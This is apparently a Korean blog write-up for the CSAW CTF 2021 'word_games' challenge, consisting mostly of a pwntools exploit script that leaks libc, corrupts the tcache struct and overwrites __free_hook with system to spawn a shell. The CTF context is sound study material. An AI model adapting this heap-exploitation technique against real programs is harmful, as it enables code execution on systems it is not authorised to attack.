[ CSAW CTF 2021 ] word_games

sangjun

·

2021. 9. 13. 18:07

반응형

1. BOF가 없는 Heap exploit?

2. fun포함한 4개 청크가 할당되면 tcache_struct free된다.

3. tcache_struct를 조작해 free_hook을 덮는다.

 

from pwn import *
context.log_level='debug'
#p=process("./a.out",env={"LD_PRELOAD":"./libc-2.33.so"})
p=process("./word_games")
e=ELF("./word_games")
#libc=ELF("./libc-2.33.so")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
#p=remote("pwn.chal.csaw.io",5001)
def malloc(size,data):
    p.sendlineafter(">","1")
    p.sendlineafter(">",str(size))
    p.sendafter(">",data)

def free_all():
    p.sendlineafter(">","2")

def debug():
    log.critical(f"pid= {pidof(p)[0]}")
    pause()
    p.interactive()

#libc leak
malloc(0x500,"A"*8)
free_all()
malloc(40,"funABBBB")
p.sendlineafter(">","3")
p.recvuntil(b"BBBB")
leak=u64(p.recvline()[:-1].ljust(8,b"\x00"))
log.critical(f"leak= {hex(leak)}")
libc_base=leak-0x4a0-libc.sym['__malloc_hook']
free_hook=libc_base+libc.sym['__free_hook']
system=libc_base+libc.sym['system']
malloc(1136,"AAAA")

malloc(0x20,"fun"+"c"*(0x20-3))
malloc(0x20,"fun"+"d"*(0x20-3))
malloc(0x20,"fun"+"c"*(0x20-3))
malloc(0x20,"fun"+"d"*(0x20-3))

payload  = b'\x00'*0xe + b'\x01\x00'
payload += b'\x00'*0x80
payload += b'\x00'*0x28
payload += p64(free_hook)
payload=payload.ljust(448,b"\x00")

malloc(0x280, payload)
malloc(0x80, p64(system))
malloc(0x10, "/bin/sh\x00")
free_all()

log.critical(f"libc_base= {hex(libc_base)}")
p.interactive()
반응형

'War Games > ctf-review' 카테고리의 다른 글

2022 Kaist GON CTF  (0) 2022.03.23
코드게이트 2022라업 VIMT  (0) 2022.02.28
[ CSAW CTF 2021 ] word_games  (0) 2021.09.13
[ CSAW CTF 2021 ] procrastination-simulator  (0) 2021.09.13
[ Alles CTF 2021 ] ccanary  (0) 2021.09.05
[ SSTF 2021 ] Exchange  (2) 2021.08.17

0개의 댓글